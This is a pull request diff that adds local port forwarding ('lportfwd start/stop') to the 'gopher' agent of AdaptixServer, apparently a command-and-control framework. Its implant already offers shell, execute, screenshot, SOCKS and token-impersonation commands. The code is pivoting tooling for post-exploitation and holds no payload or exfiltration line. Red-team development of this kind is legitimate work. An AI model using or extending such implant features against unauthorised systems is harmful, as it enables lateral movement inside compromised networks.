### PR TITLE
Add lportfwd support to gopher agent

### DIFF
--- a/AdaptixServer/extenders/gopher_agent/ax_config.axs
+++ b/AdaptixServer/extenders/gopher_agent/ax_config.axs
@@ -10,7 +10,7 @@ menu.add_session_browser(file_browser_action, ["gopher"])
 menu.add_session_browser(process_browser_action, ["gopher"])
 menu.add_session_browser(terminal_browser_action, ["gopher"])
 
-let tunnel_access_action = menu.create_action("Create Tunnel", function(agents_id) { ax.open_access_tunnel(agents_id[0], true, true, false, false) });
+let tunnel_access_action = menu.create_action("Create Tunnel", function(agents_id) { ax.open_access_tunnel(agents_id[0], true, true, true, false) });
 menu.add_session_access(tunnel_access_action, ["gopher"]);
 
 
@@ -123,6 +123,16 @@ function RegisterCommands(listenerType)
     let cmd_ls_unix = ax.create_command("ls", "List contents of a directory or details of a file", "ls /home/", "Task: list files");
     cmd_ls_unix.addArgString("path", "", ".");
 
+    let _cmd_lportfwd_start = ax.create_command("start", "Start local port forwarding from server via agent", "lportfwd start 8080 192.168.1.1 8080");
+    _cmd_lportfwd_start.addArgFlagString("-h", "lhost", "Listening interface address on server", "0.0.0.0");
+    _cmd_lportfwd_start.addArgInt("lport", true, "Listen port on server");
+    _cmd_lportfwd_start.addArgString("fwdhost", true, "Remote forwarding address");
+    _cmd_lportfwd_start.addArgInt("fwdport", true, "Remote forwarding port");
+    let _cmd_lportfwd_stop = ax.create_command("stop", "Stop local port forwarding", "lportfwd stop 8080");
+    _cmd_lportfwd_stop.addArgInt("lport", true);
+    let cmd_lportfwd = ax.create_command("lportfwd", "Managing local port forwarding");
+    cmd_lportfwd.addSubCommands([_cmd_lportfwd_start, _cmd_lportfwd_stop]);
+
     let cmd_mv = ax.create_command("mv", "Move file or directory", "mv src.txt dst.txt", "Task: move file or directory");
     cmd_mv.addArgString("src", true);
     cmd_mv.addArgString("dst", true);
@@ -182,8 +192,8 @@ function RegisterCommands(listenerType)
     cmd_zip_unix.addArgString("path", true);
     cmd_zip_unix.addArgString("zip_path", true);
 
-    let commands_win  = ax.create_commands_group("gopher", [cmd_cat_win,  cmd_cp, cmd_cd_win,  cmd_download_win,  cmd_execute, cmd_exit, cmd_job, cmd_kill, cmd_ls_win,  cmd_mv, cmd_mkdir_win,  cmd_ps, cmd_pwd, cmd_rev2self, cmd_rm_win,  cmd_run_win,  cmd_screenshot, cmd_socks, cmd_shell_win,  cmd_upload_win,  cmd_zip_win] );
-    let commands_unix = ax.create_commands_group("gopher", [cmd_cat_unix, cmd_cp, cmd_cd_unix, cmd_download_unix,              cmd_exit, cmd_job, cmd_kill, cmd_ls_unix, cmd_mv, cmd_mkdir_unix, cmd_ps, cmd_pwd,               cmd_rm_unix, cmd_run_unix, cmd_screenshot, cmd_socks, cmd_shell_unix, cmd_upload_unix, cmd_zip_unix] );
+    let commands_win  = ax.create_commands_group("gopher", [cmd_cat_win,  cmd_cp, cmd_cd_win,  cmd_download_win,  cmd_execute, cmd_exit, cmd_job, cmd_kill, cmd_ls_win,  cmd_lportfwd, cmd_mv, cmd_mkdir_win,  cmd_ps, cmd_pwd, cmd_rev2self, cmd_rm_win,  cmd_run_win,  cmd_screenshot, cmd_socks, cmd_shell_win,  cmd_upload_win,  cmd_zip_win] );
+    let commands_unix = ax.create_commands_group("gopher", [cmd_cat_unix, cmd_cp, cmd_cd_unix, cmd_download_unix,              cmd_exit, cmd_job, cmd_kill, cmd_ls_unix, cmd_lportfwd, cmd_mv, cmd_mkdir_unix, cmd_ps, cmd_pwd,               cmd_rm_unix, cmd_run_unix, cmd_screenshot, cmd_socks, cmd_shell_unix, cmd_upload_unix, cmd_zip_unix] );
 
     return {
         commands_windows: commands_win,

--- a/AdaptixServer/extenders/gopher_agent/pl_main.go
+++ b/AdaptixServer/extenders/gopher_agent/pl_main.go
@@ -138,7 +138,6 @@ func (ext *ExtenderAgent) TunnelCallbacks() adaptix.TunnelCallbacks {
 		WriteTCP:   TunnelMessageWriteTCP,
 		WriteUDP:   TunnelMessageWriteUDP,
 		Close:      TunnelMessageClose,
-		Reverse:    TunnelMessageReverse,
 		Pause:      TunnelMessagePause,
 		Resume:     TunnelMessageResume,
 	}
@@ -184,13 +183,6 @@ func TunnelMessageClose(channelId int) adaptix.TaskData {
 	packerData, _ := msgpack.Marshal(ParamsTunnelStop{ChannelId: channelId})
 	cmd := Command{Code: COMMAND_TUNNEL_STOP, Data: packerData}
 	packData, _ = msgpack.Marshal(cmd)
-	/// END CODE HERE
-	return makeProxyTask(packData)
-}
-
-func TunnelMessageReverse(tunnelId int, port int) adaptix.TaskData {
-	var packData []byte
-	/// START CODE HERE
 	/// END CODE HERE
 	return makeProxyTask(packData)
 }
@@ -777,6 +769,62 @@ func (ext *ExtenderAgent) CreateCommand(agentData adaptix.AgentData, args map[st
 		}
 		packerData, _ := msgpack.Marshal(ParamsLs{Path: dir})
 		cmd = Command{Code: COMMAND_LS, Data: packerData}
+
+	case "lportfwd":
+		taskData.Type = adaptix.TASK_TYPE_TUNNEL
+
+		lportNumber, _ := getFloatArg(args, "lport")
+		lport := int(lportNumber)
+		if lport < 1 || lport > 65535 {
+			err = errors.New("port must be from 1 to 65535")
+			goto RET
+		}
+
+		if subcommand == "start" {
+			var lhost string
+			var fhost string
+			var tunnelId string
+			lhost, err = getStringArg(args, "lhost")
+			if err != nil {
+				goto RET
+			}
+			fhost, err = getStringArg(args, "fwdhost")
+			if err != nil {
+				goto RET
+			}
+			fportNumber, _ := getFloatArg(args, "fwdport")
+			fport := int(fportNumber)
+			if fport < 1 || fport > 65535 {
+				err = errors.New("port must be from 1 to 65535")
+				goto RET
+			}
+
+			tunnelId, err = Ts.TsTunnelCreateLportfwd(agentData.Id, "", lhost, lport, fhost, fport)
+			if err != nil {
+				goto RET
+			}
+			taskData.TaskId, err = Ts.TsTunnelStart(tunnelId)
+			if err != nil {
+				goto RET
+			}
+
+			taskData.Message = fmt.Sprintf("Started local port forwarding on %s:%d to %s:%d", lhost, lport, fhost, fport)
+			taskData.MessageType = adaptix.MESSAGE_SUCCESS
+			taskData.ClearText = "\n"
+
+		} else if subcommand == "stop" {
+			taskData.Completed = true
+
+			Ts.TsTunnelStopLportfwd(agentData.Id, lport)
+
+			taskData.Message = fmt.Sprintf("Local port forwarding on %d stopped", lport)
+			taskData.MessageType = adaptix.MESSAGE_SUCCESS
+			taskData.ClearText = "\n"
+
+		} else {
+			err = errors.New("subcommand must be 'start' or 'stop'")
+			goto RET
+		}
 
 	case "mv":
 		src, err := getStringArg(args, "src")
@@ -1644,9 +1692,10 @@ func (ext *ExtenderAgent) ProcessData(agentData adaptix.AgentData, decryptedData
 
 			case COMMAND_REV2SELF:
 				task.Message = "Token reverted successfully"
+				emptyImpersonate := ""
 				_ = Ts.TsAgentUpdateDataPartial(agentData.Id, struct {
 					Impersonated *string `json:"impersonated"`
-				}{Impersonated: new("")})
+				}{Impersonated: &emptyImpersonate})
 
 			case COMMAND_RM:
 				task.Message = "Object deleted successfully"

--- a/AdaptixServer/extenders/gopher_agent/src_gopher/tasks.go
+++ b/AdaptixServer/extenders/gopher_agent/src_gopher/tasks.go
@@ -511,11 +511,11 @@ func taskTunnelKill(paramsData []byte) {
 	}
 }
 
-func taskTunnelPause(paramsData []byte) {
+func taskTunnelPause(paramsData []byte) ([]byte, error) {
 	var params utils.ParamsTunnelPause
 	err := msgpack.Unmarshal(paramsData, &params)
 	if err != nil {
-		return
+		return nil, err
 	}
 
 	value, ok := TUNNELS.Load(params.ChannelId)
@@ -525,13 +525,14 @@ func taskTunnelPause(paramsData []byte) {
 			ctrl.Paused.Store(true)
 		}
 	}
+	return nil, nil
 }
 
-func taskTunnelResume(paramsData []byte) {
+func taskTunnelResume(paramsData []byte) ([]byte, error) {
 	var params utils.ParamsTunnelResume
 	err := msgpack.Unmarshal(paramsData, &params)
 	if err != nil {
-		return
+		return nil, err
 	}
 
 	value, ok := TUNNELS.Load(params.ChannelId)
@@ -541,6 +542,7 @@ func taskTunnelResume(paramsData []byte) {
 			ctrl.Paused.Store(false)
 		}
 	}
+	return nil, nil
 }
 
 func taskUpload(paramsData []byte) ([]byte, error) {


### PR DESCRIPTION
Added local port forwarding support to the Gopher agent. It works via CLI and the GUI (supporting both Teamserver and Client-side forwarding, similar to how SOCKS is handled).

**Commands added:**

* `lportfwd start [-h lhost] <lport> <fwdhost> <fwdport>`
* `lportfwd stop <lport>`